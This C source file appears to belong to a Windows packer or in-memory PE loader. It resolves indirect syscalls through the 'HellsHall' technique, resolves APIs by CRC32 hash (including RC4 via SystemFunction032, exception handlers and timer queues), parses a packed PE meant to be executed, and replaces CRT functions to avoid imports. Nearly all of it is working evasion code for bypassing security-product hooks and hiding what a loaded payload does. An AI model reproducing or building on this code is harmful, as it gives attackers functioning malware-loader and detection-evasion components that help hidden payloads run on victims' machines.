#include <Windows.h>

#include "Common.h"
#include "Debug.h"


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   Initialize an input 'NT_API' struct that will contain all required information to execute a syscall via HellsHall (indirect syscalls).
*
*   For each of NtOpenSection, NtMapViewOfSection, NtUnmapViewOfSection, NtAllocateVirtualMemory, NtProtectVirtualMemory
*   and NtFlushInstructionCache, 'FetchNtSyscall' is called with that function's CRC32 hash to fill the matching member of 'Nt'.
*   The debug output shows that each member carries an SSN ('dwSSn') and the address of a 'syscall' instruction ('pSyscallInstAddress').
*
*   Nt  - struct to fill. Although annotated OUT, 'Nt->bInit' is read before anything is written, so the caller must initialize
*         it beforehand (presumably by zeroing the whole struct — confirm at call sites).
*
*   Returns TRUE when every entry was resolved, or immediately when 'Nt->bInit' is already set (nothing is re-fetched then).
*   Returns FALSE at the first 'FetchNtSyscall' failure. Entries fetched before the failure are left as written and 'Nt->bInit'
*   stays unset, so a later call starts over from the first entry.
*/
BOOL InitIndirectSyscalls(OUT PNT_API Nt)
{

    // Already resolved by an earlier successful call
    if (Nt->bInit)
        return TRUE;

    if (!FetchNtSyscall(NtOpenSection_CRC32, &Nt->NtOpenSection)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtOpenSection\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtMapViewOfSection_CRC32, &Nt->NtMapViewOfSection)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtMapViewOfSection\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtUnmapViewOfSection_CRC32, &Nt->NtUnmapViewOfSection)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtUnmapViewOfSection\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtAllocateVirtualMemory_CRC32, &Nt->NtAllocateVirtualMemory)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtAllocateVirtualMemory\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtProtectVirtualMemory_CRC32, &Nt->NtProtectVirtualMemory)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtProtectVirtualMemory\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtFlushInstructionCache_CRC32, &Nt->NtFlushInstructionCache)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtFlushInstructionCache\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    // Debug builds only: dump the SSN and 'syscall' instruction address resolved for each entry
#ifdef DEBUG
    PRINT("[V] NtOpenSection [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtOpenSection.dwSSn, Nt->NtOpenSection.pSyscallInstAddress);
    PRINT("[V] NtMapViewOfSection [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtMapViewOfSection.dwSSn, Nt->NtMapViewOfSection.pSyscallInstAddress);
    PRINT("[V] NtUnmapViewOfSection [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtUnmapViewOfSection.dwSSn, Nt->NtUnmapViewOfSection.pSyscallInstAddress);
    PRINT("[V] NtAllocateVirtualMemory [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtAllocateVirtualMemory.dwSSn, Nt->NtAllocateVirtualMemory.pSyscallInstAddress);
    PRINT("[V] NtProtectVirtualMemory [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtProtectVirtualMemory.dwSSn, Nt->NtProtectVirtualMemory.pSyscallInstAddress);
    PRINT("[V] NtFlushInstructionCache [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtFlushInstructionCache.dwSSn, Nt->NtFlushInstructionCache.pSyscallInstAddress);
#endif 

    // Only flagged as initialized once every entry above resolved successfully
    Nt->bInit = TRUE;

    return TRUE;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   Initialize an input 'WINAPIs' struct that will contain all required information to execute a WinAPI through API hashing.
*
*   Each function pointer is resolved with GetProcAddressH(GetModuleHandleH(<module CRC32>), <function CRC32>):
*   LoadLibraryA, AddVectoredExceptionHandler, RemoveVectoredExceptionHandler, CreateTimerQueue, CreateTimerQueueTimer,
*   RtlAddFunctionTable, InitializeCriticalSection, EnterCriticalSection and LeaveCriticalSection are looked up in
*   kernel32.dll, and SystemFunction032 in advapi32.dll.
*
*   pWinAPIs - struct to fill; it is dereferenced without a NULL check.
*
*   Returns TRUE once every pointer is resolved. Returns FALSE at the first pointer that resolves to NULL; pointers
*   resolved before that point are left in place.
*
*   NOTE(review): GetModuleHandleH(kernel32dll_CRC32) is re-evaluated for every API; it could be looked up once.
*/
BOOL InitializeWinAPIs(OUT PWINAPIs pWinAPIs) 
{
    // LoadLibraryA should always be the first API to resolve (it's used in GetProcAddressH in case of a forwarded function)
    if (!(pWinAPIs->pLoadLibraryA = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), LoadLibraryA_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve LoadLibraryA's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pAddVectoredExceptionHandler = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), AddVectoredExceptionHandler_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve AddVectoredExceptionHandler's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pRemoveVectoredExceptionHandler = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), RemoveVectoredExceptionHandler_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve RemoveVectoredExceptionHandler's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    // VirtualProtect resolution is currently disabled; the original check is kept below for reference
/*
    if (!(pWinAPIs->pVirtualProtect = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), VirtualProtect_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve VirtualProtect's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }
*/

    if (!(pWinAPIs->pCreateTimerQueue = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), CreateTimerQueue_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve CreateTimerQueue's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pCreateTimerQueueTimer = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), CreateTimerQueueTimer_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve CreateTimerQueueTimer's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pRtlAddFunctionTable = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), RtlAddFunctionTable_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve RtlAddFunctionTable's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pInitializeCriticalSection = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), InitializeCriticalSection_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve InitializeCriticalSection's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pEnterCriticalSection = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), EnterCriticalSection_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve EnterCriticalSection's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pLeaveCriticalSection = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), LeaveCriticalSection_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve LeaveCriticalSection's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    // NOTE(review): advapi32.dll is only looked up here, never loaded. If GetModuleHandleH searches only modules
    // already present in the process, this fails when advapi32.dll has not been loaded yet — confirm.
    if (!(pWinAPIs->pSystemFunction032 = GetProcAddressH(GetModuleHandleH(advapi32dll_CRC32), SystemFunction032_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve SystemFunction032's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    return TRUE;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   Initialize an input 'PE_HDRS' struct that will contain all required information about the packed PE file to get executed
*
*   pPeHdrs     - struct to fill
*   pFileBuffer - buffer holding the PE file (presumably its raw file contents — confirm at call sites)
*   dwFileSize  - size of 'pFileBuffer' in bytes
*
*   Returns FALSE, leaving 'pPeHdrs' untouched, in any of these cases:
*     - an argument is NULL or zero;
*     - the DOS header, NT headers or section table do not lie entirely inside 'dwFileSize' bytes;
*     - a DOS or NT signature is wrong;
*     - the optional-header magic does not match the bitness this code was compiled for.
*   Otherwise fills every member and returns TRUE.
*
*   The header / data-directory members point INTO 'pFileBuffer', so the buffer must outlive 'pPeHdrs'.
*/
BOOL InitializePeStruct(OUT PPE_HDRS pPeHdrs, IN PBYTE pFileBuffer, IN DWORD dwFileSize)
{
    PIMAGE_DOS_HEADER   pImgDosHdr      = NULL;
    PIMAGE_NT_HEADERS   pImgNtHdrs      = NULL;
    ULONG_PTR           uBufferEnd      = 0x00;
    ULONG_PTR           uSecTableEnd    = 0x00;

    if (!pPeHdrs || !pFileBuffer || !dwFileSize)
        return FALSE;

    // The DOS header must fit and carry the 'MZ' signature before 'e_lfanew' can be trusted
    if (dwFileSize < sizeof(IMAGE_DOS_HEADER))
        return FALSE;

    pImgDosHdr = (PIMAGE_DOS_HEADER)pFileBuffer;
    if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE)
        return FALSE;

    // 'e_lfanew' is a signed LONG read from the file: reject negative offsets and NT headers that would run past the buffer
    if (pImgDosHdr->e_lfanew < 0 || dwFileSize < sizeof(IMAGE_NT_HEADERS) || (DWORD)pImgDosHdr->e_lfanew > dwFileSize - sizeof(IMAGE_NT_HEADERS))
        return FALSE;

    pImgNtHdrs = (PIMAGE_NT_HEADERS)(pFileBuffer + pImgDosHdr->e_lfanew);
    if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
        return FALSE;

    // IMAGE_NT_HEADERS is the 32- or 64-bit layout of this build; a PE of the other bitness keeps its DataDirectory at a different offset
    if (pImgNtHdrs->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR_MAGIC)
        return FALSE;

    // The section table (located through SizeOfOptionalHeader by IMAGE_FIRST_SECTION) must also lie inside the buffer
    uBufferEnd   = (ULONG_PTR)pFileBuffer + dwFileSize;
    uSecTableEnd = (ULONG_PTR)IMAGE_FIRST_SECTION(pImgNtHdrs) + (ULONG_PTR)pImgNtHdrs->FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER);
    if (uSecTableEnd > uBufferEnd)
        return FALSE;

    pPeHdrs->pFileBuffer            = pFileBuffer;
    pPeHdrs->dwFileSize             = dwFileSize;
    pPeHdrs->pImgNtHdrs             = pImgNtHdrs;
    pPeHdrs->bIsDLLFile             = (pImgNtHdrs->FileHeader.Characteristics & IMAGE_FILE_DLL) ? TRUE : FALSE;
    pPeHdrs->pImgSecHdr             = IMAGE_FIRST_SECTION(pImgNtHdrs);
    pPeHdrs->pEntryImportDataDir    = &pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    pPeHdrs->pEntryBaseRelocDataDir = &pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    pPeHdrs->pEntryTLSDataDir       = &pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS];
    pPeHdrs->pEntryExceptionDataDir = &pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
    pPeHdrs->pEntryExportDataDir    = &pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

    return TRUE;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

/*
*   Hashes a NUL-terminated ANSI string with a bit-by-bit CRC-32 (reflected form, polynomial CRC_POLYNOMIAL).
*   Adapted from: https://stackoverflow.com/a/21001712
*
*   Note: the register starts at 0xFFFFEFFF rather than the standard 0xFFFFFFFF, and each 'char' is widened directly
*   (so bytes >= 0x80 are sign-extended where 'char' is signed). The precomputed *_CRC32 constants presumably depend
*   on both quirks — keep them unless every hash constant is regenerated.
*/

UINT32 CRC32B(LPCSTR cString)
{
    UINT32  uCrc    = 0xFFFFEFFF;
    LPCSTR  pCursor = cString;

    for (; *pCursor != 0; pCursor++) {

        uCrc ^= (UINT32)*pCursor;

        // Shift out one bit at a time, folding in the polynomial whenever the dropped bit was set
        for (INT iBit = 0; iBit < 8; iBit++)
            uCrc = (uCrc >> 1) ^ ((uCrc & 1) ? CRC_POLYNOMIAL : 0);
    }

    return ~uCrc;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

/*
*   Pseudo-random number generator using Marsaglia's xorshift with shift triple (13, 17, 5) on an unsigned int.
*   The state is a function-local static seeded with the constant 123456789, so the same sequence is produced on every run.
*   Not suitable for cryptographic use, and the shared state is not synchronized between threads.
*/
unsigned int GenerateRandomInt()
{
    static unsigned int uSeed = 123456789;
    unsigned int        uNext = uSeed;

    uNext ^= (uNext << 13);
    uNext ^= (uNext >> 17);
    uNext ^= (uNext << 5);

    uSeed = uNext;
    return uNext;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   CRT-free replacement for 'wcscat': appends the wide string 'pSource' (including its terminator) to the end of 'pDest'.
*   Despite its IN annotation, 'pDest' is written: it must already be NUL-terminated and have room for every
*   character of 'pSource' plus the terminator — no bounds are checked.
*/
VOID Wcscat(IN WCHAR* pDest, IN WCHAR* pSource)
{
    WCHAR*  pWrite = pDest;
    SIZE_T  i      = 0;

    // Seek to the destination's existing terminator
    while (*pWrite)
        ++pWrite;

    // Copy source characters up to and including its terminator
    do {
        pWrite[i] = pSource[i];
    } while (pSource[i++] != 0);
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   CRT-free replacement for 'memcpy': copies 'sLength' bytes from 'pSource' to 'pDestination', front to back.
*   The regions must not overlap in a way that front-to-back copying would corrupt (same contract as memcpy).
*/
VOID Memcpy(IN PVOID pDestination, IN PVOID pSource, SIZE_T sLength)
{
    PBYTE   pDst = (PBYTE)pDestination;
    PBYTE   pSrc = (PBYTE)pSource;

    for (SIZE_T i = 0; i < sLength; i++)
        pDst[i] = pSrc[i];
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
// After removing CRT:

// Replaces 'memset' while compiling: without the CRT, calls the compiler emits to memset must resolve to this definition.
// '#pragma function(memset)' (which takes effect after the preceding 'intrinsic' pragma) makes MSVC treat memset as a real
// function so it can be defined here.
extern void* __cdecl memset(void*, int, size_t);

#pragma intrinsic(memset)
#pragma function(memset)
void* __cdecl memset(void* pTarget, int value, size_t cbTarget) {
    unsigned char*  pByte = (unsigned char*)pTarget;
    unsigned char   uFill = (unsigned char)value;

    // NOTE(review): an optimizer may recognize this fill loop as memset itself; confirm the generated code does not self-call.
    for (size_t i = 0; i < cbTarget; i++)
        pByte[i] = uFill;

    return pTarget;
}


// Replaces 'strrchr' while compiling. 'strrchr' is called from the 'GET_FILENAME' macro located in the 'Debug.h' file
// Declared with the standard 'char*' return type so it agrees with the definition below (and with <string.h>).
extern char* __cdecl strrchr(const char*, int);

#pragma intrinsic(strrchr)
#pragma function(strrchr)
/*
*   Returns a pointer to the last occurrence of (char)c in 'str', or NULL if it does not occur.
*   As required by the C standard, the terminating NUL counts as part of the string, so strrchr(s, 0) returns a pointer to it.
*/
char* __cdecl strrchr(const char* str, int c) {
    const char  cTarget         = (char)c;   // the standard compares against c converted to char (matters for bytes >= 0x80)
    const char* pLastOccurrence = NULL;

    // do/while so the terminator itself is examined before the loop stops
    do {
        if (*str == cTarget)
            pLastOccurrence = str;
    } while (*str++);

    return (char*)pLastOccurrence;
}